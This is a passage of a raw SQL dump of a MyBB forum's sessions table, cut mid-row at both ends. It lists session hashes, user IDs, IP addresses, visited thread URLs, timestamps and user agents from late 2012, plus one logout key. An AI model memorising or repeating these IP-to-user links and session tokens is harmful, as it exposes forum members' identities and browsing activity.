'1351515920', '/showthread.php?tid=1100', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '42', '1100'); INSERT INTO mybb_sessions VALUES('24a62fcd3506e908924a570f71fe20df', '279', '122.162.83.200', '1350638154', '/showthread.php?tid=51&amp;page=2', 'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '11', '51'); INSERT INTO mybb_sessions VALUES('c92359bdd6201d6bd0de1feaab293e74', '275', '92.40.175.24', '1350550976', '/forumdisplay.php?fid=42&amp;page=2', 'Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mo', '0', '0', '42', '0'); INSERT INTO mybb_sessions VALUES('ea6de0af48c76378d9a01eb6d1b62939', '270', '2.124.223.31', '1350912932', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3a8b02e919ba74aa3ebd456968285402', '276', '66.162.121.76', '1350577249', '/forumdisplay.php?fid=27', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '27', '0'); INSERT INTO mybb_sessions VALUES('89a553951c7bcb90a5b639001afb0ced', '286', '189.231.170.101', '1350943601', '/showthread.php?tid=100', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '18', '100'); INSERT INTO mybb_sessions VALUES('45802093d51ddfc5456ff03906402186', '278', '82.157.58.115', '1350615025', '/showthread.php?tid=981', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari', '0', '0', '4', '981'); INSERT INTO mybb_sessions VALUES('ba6a50adb023b8f0f3eb7b0c4bad9005', '3', '75.22.48.43', '1351314831', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('42466474e09358de24dec4b8c97e12cc', '246', '192.200.145.194', '1351466025', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('492a73687aaaccc9ede18ea5c62caac0', '280', '78.105.190.251', '1350686343', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e309c19b6acb8c8001795c4d365faead', '284', '31.172.30.3', '1350919398', '/upgrade.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('1dcac2f01f8f0522cb573e9dd02e7bfa', '264', '87.55.196.22', '1350755519', '/reputation.php?uid=228', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c9578a1b0b6a6c203682dc6b1c53cc7c', '282', '208.94.131.5', '1350674090', '/forumdisplay.php?fid=16&amp;page=3', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '16', '0'); INSERT INTO mybb_sessions VALUES('52b9d58db5e51860c54546a25c64353f', '259', '101.163.15.100', '1351509401', '/showthread.php?tid=312', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '15', '312'); INSERT INTO mybb_sessions VALUES('5e14049d2b2e913c6c07ab31844b22a7', '283', '122.149.177.181', '1350732865', '/showthread.php?tid=922', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('e0421f96f81098ddc1d869a087fdc1fd', '285', '71.239.97.104', '1351030889', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e50fee1916eb59ed97138be181b5a49f', '214', '71.72.242.232', '1351375580', '/showthread.php?tid=938', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('f0c717c271ce087767ec160bfbd98f3a', '296', '91.148.160.213', '1351343062', '/showthread.php?tid=49', 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '21', '49'); INSERT INTO mybb_sessions VALUES('cdcde3bff68b2765d8153fdec8838eca', '297', '113.23.6.183', '1351343109', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('690263a5e5df912470ac8f9ab6d6e678', '287', '129.121.102.35', '1351165666', '/usercp.php?', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('e1bcacdf30526d9e18b4d88ed5fc4bed', '294', '201.50.255.69', '1351894585', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('df3d3a1609d0ede64354e9807d48b893', '292', '216.218.102.116', '1351239004', '/index.php?', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('166b024e8ccf71997ae72a86f6beaa6e', '228', '83.83.167.183', '1352754885', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9332a6ad904dea60226dbac5debf633f', '307', '178.63.247.151', '1351662543', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '9', '0'); INSERT INTO mybb_sessions VALUES('441709400acf452c7799c2536149c707', '299', '69.132.1.54', '1351452752', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('4292c34c3af788033393efd69614db41', '305', '24.223.234.22', '1351608870', '/showthread.php?tid=74', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '12', '74'); INSERT INTO mybb_sessions VALUES('c92cc1903633256bd608a47fa0431722', '308', '46.109.225.132', '1352330487', '/forumdisplay.php?fid=11', 'Opera/9.80 (Windows NT 6.1; WOW64; U; en) Presto/2.10.289 Version/12.02', '0', '0', '11', '0'); INSERT INTO mybb_sessions VALUES('383190cefe1aaad289c01cce63b97b49', '300', '81.34.148.34', '1351460256', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('3dd334d7f694126fa2ab11ffdce744e5', '302', '74.240.167.148', '1351808164', '/showthread.php?tid=1175&amp;pid=6892', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '4', '1175'); INSERT INTO mybb_sessions VALUES('064ed695e811e4707680ce560cf656f9', '304', '109.63.12.49', '1351602535', '/forumdisplay.php?fid=12&amp;page=3', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS103662; SLCC2; .NET CLR 2.0.5072', '0', '0', '12', '0'); INSERT INTO mybb_sessions VALUES('e10fa76850df4132c64fde5d17ad216c', '198', '184.90.113.116', '1351734172', '/index.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.122', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bac3c9f60b70392aeb02030d6bd72f2c', '301', '129.121.104.93', '1351702345', '/usercp.php?action=editsig', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f735ba4b89fc3fad8f6538fb46487ae6', '84', '111.91.95.12', '1352133647', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('59a479e52e65eb48c96e744bf7af82b5', '262', '108.162.138.186', '1352619851', '/showthread.php?tid=1236', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '3', '1236'); INSERT INTO mybb_sessions VALUES('8bed260da255d263ace1e7f0b258ca35', '309', '95.10.175.178', '1351780680', '/forumdisplay.php?fid=9', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '9', '0'); INSERT INTO mybb_sessions VALUES('dd3d7b8bec86a098f178a988036c0ab6', '311', '112.210.100.164', '1352518062', '/showthread.php?tid=20', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0', '0', '0', '13', '20'); INSERT INTO mybb_sessions VALUES('25ad906c8862668fd51919649998a86d', '312', '41.200.43.51', '1351965282', '/showthread.php?tid=964', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '15', '964'); INSERT INTO mybb_sessions VALUES('e9515521fa0ed67a5e0d2c347a2048bd', '199', '85.230.49.83', '1352594343', '/forumdisplay.php?fid=15', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '15', '0'); INSERT INTO mybb_sessions VALUES('c5efd1d4bdbeae9ff8f77c3746515cf2', '327', '72.95.249.219', '1352246107', '/showthread.php?tid=1118', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '9', '1118'); INSERT INTO mybb_sessions VALUES('1268b69d6c2b96110c12b4578db70e4b', '2', '173.206.129.140', '1352433307', '/search.php?action=results&amp;sid=4823d566f00db728f151bc8d52b82182', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ba27cc556eaaa3fbafd0bc70d02da02c', '315', '194.150.65.31', '1351937610', '/showthread.php?tid=1059', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '9', '1059'); INSERT INTO mybb_sessions VALUES('3dc7579c92955c9886b84c838b9b68a2', '316', '106.206.163.177', '1352018730', '/newreply.php?ajax=1&amp;action=do_newreply&amp;tid=1149', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.6', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f6583be53c1331f138f901ccba701fc2', '313', '69.125.203.115', '1351877109', '/search.php?action=results&amp;sid=74538da239041f266ab6d5cd1c043f14', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8fcc36a87ce9fe50ac3fd496bb37903e', '310', '41.104.87.48', '1351894538', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bbdb5740ff2c0026778ee9355a51edb7', '297', '118.71.125.18', '1352145936', '/showthread.php?tid=1162', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '12', '1162'); INSERT INTO mybb_sessions VALUES('5f5103a9b6b49b82bb96071a6198f0be', '255', '27.97.172.200', '1352373119', '/forumdisplay.php?fid=54&amp;page=2', 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0 CometBird/11.0', '0', '0', '54', '0'); INSERT INTO mybb_sessions VALUES('c9a9243d45ef763a9157642593f017ec', '321', '24.191.244.156', '1352127957', '/showthread.php?tid=26', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.95 Safari/537.4', '0', '0', '17', '26'); INSERT INTO mybb_sessions VALUES('ea891647cbdc8e84f798304de166e08f', '318', '174.31.250.155', '1351985775', '/showthread.php?tid=212&amp;page=5', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '58', '212'); INSERT INTO mybb_sessions VALUES('ad161c03a3013ef025d4be213a71b712', '232', '78.150.46.86', '1352001220', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('bf3eb2a03e0a73f1aaa26c0f37d9095b', '0', '174.34.162.242', '1352759449', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ab02c0140d05606de3b1ad047a5ac299', '319', '173.0.11.244', '1352201191', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '13', '0'); INSERT INTO mybb_sessions VALUES('c53b95a26a7fdf288309eecf0845f877', '320', '79.24.200.253', '1352034824', '/showthread.php?tid=1149', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', '0', '0', '20', '1149'); INSERT INTO mybb_sessions VALUES('19293ca1578f94341e3797c75490f19b', '0', '65.55.24.244', '1352701409', '/showthread.php?tid=877', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '0', '11', '877'); INSERT INTO mybb_sessions VALUES('7723bdd717da8f4c15c5b83821d101c9', '306', '184.6.224.250', '1352164510', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a27d32434f9136e8e7cb57cd58c2482c', '324', '67.181.154.90', '1352747822', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('16d3c330af3d98d079b8c2ab2fefce5f', '160', '142.255.31.241', '1352326739', '/private.php?action=read&amp;pmid=4041', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('62adf2f212b0d258ea532f50115163e4', '325', '108.254.243.128', '1352684774', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('783f8de804dd45c330a28fa4860ae773', '0', '208.43.68.59', '1352759268', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a390ad4c4d574d293bdfba88ecfaca02', '53', '188.155.56.90', '1352744517', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('efcc88b45c6a98f9f7847375cfd64e36', '205', '108.162.248.5', '1352717095', '/index.php?', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .N', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f3627f375d672b89465675922d5a131f', '0', '178.255.155.2', '1352759208', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('6ed241604d88b0fa2eafe49056bd68a8', '0', '188.138.118.184', '1352759508', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('1e1ad3788a0588b62d9cffcda9272b8f', '0', '184.75.210.186', '1352759632', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('fd899be8a69ebf85cfc386f46c8cafca', '0', '174.34.156.130', '1352759388', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('fdd625c8d5cd4d59b316f391214421a0', '0', '74.67.7.114', '1352757710', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a39308324de38a42e301e39cc5d730b1', '150', '86.147.121.117', '1352508525', '/search.php?action=results&amp;sid=efaff82cf23850e0057194f8cbb91daa', 'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en-GB) AppleWebKit/534.11+ (KHTML, like Gecko) Version/', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('461fe16538f89466452293b8a97071a9', '0', '85.17.156.99', '1352759568', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('9c9de18e2caaefcd4407c443f99784b6', '0', '210.197.212.30', '1352596915', '/index.php?', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; YJTH3; YTB730) 1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('f71b339349f6638f59cbeafb34db002a', '329', '68.170.228.35', '1352377741', '/showthread.php?tid=1012', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '16', '1012'); INSERT INTO mybb_sessions VALUES('cfb42d09499bb3939f3af00ec33381ff', '330', '78.3.250.129', '1352373384', '/showthread.php?tid=1208', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '9', '1208'); INSERT INTO mybb_sessions VALUES('f78699e2c12f32bf8e86e40b8f2001f3', '5', '165.155.208.77', '1352393968', '/member.php?action=logout&amp;logoutkey=cb5fc7fc49bb8b131613e119572f8674', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('30d7141f6eb08b2e039fd5f3dde886ec', '67', '193.161.89.202', '1352708901', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('31d259d89db5161a9e3f2fa9aeeb4657', '333', '71.231.38.67', '1352625017', '/showthread.php?tid=1235', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '42', '1235'); INSERT INTO mybb_sessions VALUES('8144e316fe3e02f9dac9f58704efa2fe', '334', '173.245.50.14', '1352757778', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('8a97f12b276109d21c743c56515127f6', '331', '195.60.76.223', '1352409541', '/showthread.php?tid=647', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4', '0', '0', '14', '647'); INSERT INTO mybb_sessions VALUES('9c155201a3239f142e1f83198cdd4382', '332', '2.130.82.35', '1352548132', '/forumdisplay.php?fid=13', 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko', '0', '0', '13', '0'); INSERT INTO mybb_sessions VALUES('bot=18', '0', '204.236.226.210', '1352743883', '/index.php?', 'ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7ec5019a7911391a07d392c2117d3560', '338', '173.206.71.165', '1352504168', '/showthread.php?tid=745', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '59', '745'); INSERT INTO mybb_sessions VALUES('ffbb755e9c18bcdc255cc4a07eac809b', '0', '31.153.62.231', '1352745426', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('ca26fdb400122a48fb4b6c117c8cdaf6', '0', '173.252.101.117', '1352716512', '/showthread.php?tid=691&amp;action=lastpost', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)', '0', '0', '3', '691'); INSERT INTO mybb_sessions VALUES('67b1614fdd2f0b5dcd502fd9af662f24', '335', '110.36.19.190', '1352454409', '/search.php?action=results&amp;sid=c15427bfec93fe10bd7ec7b1b3859473', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('16aac790f0713a1a0b9a7bbc3e71bc9f', '0', '50.57.131.145', '1352708238', '/index.php?', 'Ruby', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b703219b37efd34055be3d6de97d7a82', '232', '78.150.34.195', '1352516717', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('903af717e46c6b7d5239306537506292', '0', '173.245.57.56', '1352678244', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('373b04925bb7d622164e490f88fca6a9', '336', '94.0.114.45', '1352470846', '/contact.php?&amp;action=do_send_contact', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c6c3f1129c77588b3a210d0f1d126b9f', '0', '173.245.62.14', '1352749084', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('488df718e1ef886e7ac09f524dad0d7a', '323', '216.119.145.99', '1352479043', '/showthread.php?tid=26', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.70 Safari/535.11', '0', '0', '17', '26'); INSERT INTO mybb_sessions VALUES('59c113ad6d28a20396e4398d2d1bf4ac', '0', '199.59.149.167', '1352596918', '/index.php?', 'Twitterbot/1.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c3cbef7fc3ae2de2477b3927767fe5f6', '0', '37.59.16.155', '1352597414', '/index.php?', 'Mozilla/5.0 (compatible; PaperLiBot/2.1; http://support.paper.li/entries/20023257-what-is-paper-li)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('4be768716e0e8cd3737fcd5a924bc681', '0', '46.236.7.67', '1352596916', '/index.php?', 'Mozilla/5.0 (compatible; TweetmemeBot/3.0; +http://tweetmeme.com/)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('194bddb9a802041a000f3fcce5447e83', '0', '74.112.131.148', '1352596916', '/index.php?', 'Mozilla/5.0 (compatible; Butterfly/1.0; +http://labs.topsy.com/butterfly/) Gecko/2009032608 Firefox/', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('eef904ca78926561a1c443a7c1abf92b', '339', '81.96.99.120', '1352517104', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('288ff420fc6573ddf2a0bf9878debdf9', '0', '37.177.201.9', '1352757764', '/memberlist.php?', 'Mozilla/5.0 (Linux; U; Android 2.3.4; it-it; GT-S5670 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, l', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a7f8612d53f24fd4778355d81766051f', '0', '173.245.62.11', '1352703476', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.1', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('20b9b31dd52279bcb7d1ca2a9d80fc42', '0', '50.23.94.74', '1352759149', '/index.php?', 'Pingdom.com_bot_version_1.4_(http://www.pingdom.com)', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('892c455ee32df208ee280ffe0c47f256', '0', '67.167.176.80', '1352679270', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('a362e62a1d55b2b19ef33b0a22908bd3', '0', '119.56.76.21', '1352619056', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('7ea957d457a290be1d4de8eeb1644395', '0', '24.212.197.164', '1352752905', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('2a41bf75ee89e8569d0c9d94c9780005', '0', '14.102.66.225', '1352681399', '/index.php?', 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20100101 Firefox/16.0 AlexaToolbar/alxf-2.17', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('c365f564aa0c5cafc52436e800e15813', '0', '192.200.145.141', '1352601474', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('4dac55a5eb99293476e10d31450c60c2', '340', '94.13.75.42', '1352544963', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safar', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('07e46fc544e8c6ed2679cfcb675b8ee8', '0', '157.55.35.88', '1352632492', '/forumdisplay.php?fid=46', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '0', '1', '0', '0'); INSERT INTO mybb_sessions VALUES('874c73d47e7204c370e23712a51f7539', '0', '216.244.81.250', '1352641710', '/forumdisplay.php?fid=35&amp;page=3', 'Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0', '0', '0', '35', '0'); INSERT INTO mybb_sessions VALUES('fa449872fad4d626daaf6f74ad54af13', '0', '173.245.51.11', '1352744086', '/index.php?', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.5 Safari', '0', '0', '0', '0'); INSERT INTO mybb_sessions VALUES('b527f5b89b0113e5f350cbae1d213950', '341', '197.6.136.191', '1352555731', '/showthread.php?tid=957', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '9', '957'); INSERT INTO mybb_sessions 